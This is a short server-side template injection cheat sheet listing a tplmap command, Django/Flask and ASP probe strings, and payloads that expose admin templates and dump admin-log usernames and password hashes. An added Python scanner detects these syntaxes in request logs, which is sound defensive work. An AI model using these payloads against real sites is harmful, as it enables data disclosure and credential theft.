caon.io

SSTI

Tools

# https://github.com/epinna/tplmap
tplmap.py -u 'http://www.target.com/page?name=John'

Python Django/Flask

Detection:

{% if 'str' == 'str' %} vuln {% endif %}
{% debug %}

Disclose pages:

{% include 'admin/base.html' %}

Disclose log table:

{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{e.user.get_username}} : {{e.user.password}}{% endfor %}

ASP/ASP.NET/ASPX

  • % is a key character
  • If <% returns 500, try <%= 7*7 %>
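
Added example (not from the original page or from tplmap): a log-side check that flags request parameters carrying the Django and ASP template syntax listed above, including double URL-encoded forms. The request targets, parameter names and the "probe"/"disclosure" labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Delimiters of the template syntaxes covered on this page.
PATTERNS = {
    "django-tag": re.compile(r"\{%-?\s*(\w+).*?%\}", re.S),
    "django-expr": re.compile(r"\{\{.*?\}\}", re.S),
    "asp-block": re.compile(r"<%.*?%>", re.S),
}
# Tags the page lists under "Disclose ..." rather than "Detection".
DISCLOSURE_TAGS = {"include", "load"}

# Constructed sample request targets, as they would appear in an access log.
SAMPLE_REQUESTS = [
    "/page?name=John",
    "/page?name=%7B%25%20debug%20%25%7D",
    "/page?name=%7B%25%20include%20%27admin%2Fbase.html%27%20%25%7D",
    "/page?q=%253C%2525%253D%25207*7%2520%2525%253E",  # double-encoded <%= 7*7 %>
    "/search?q=100%25+cotton&sort=price",
]

def decode_layers(value, max_rounds=3):
    """Yield the value and each further URL-decoding of it (%257B -> %7B -> {)."""
    yield value
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            return
        value = decoded
        yield value

def scan_request(target):
    """Return (param, syntax, label) for every parameter carrying template syntax."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # Check every decoding layer: decoding "{%debug%}" once more would garble it.
        layers = list(decode_layers(raw))
        for syntax, rx in PATTERNS.items():
            hits = [m for m in (rx.search(v) for v in layers) if m]
            if not hits:
                continue
            tag = hits[0].group(1).lower() if syntax == "django-tag" else ""
            label = "disclosure" if tag in DISCLOSURE_TAGS else "probe"
            findings.append((name, syntax, label))
    return findings

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(target, "->", scan_request(target) or "clean")
```

A literal percent sign in ordinary input ("100% cotton") is not flagged, because a match needs a full opening and closing delimiter pair.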

Tips

Try the SSTI fuzz string provided in the cobalt.io blog post referred to below.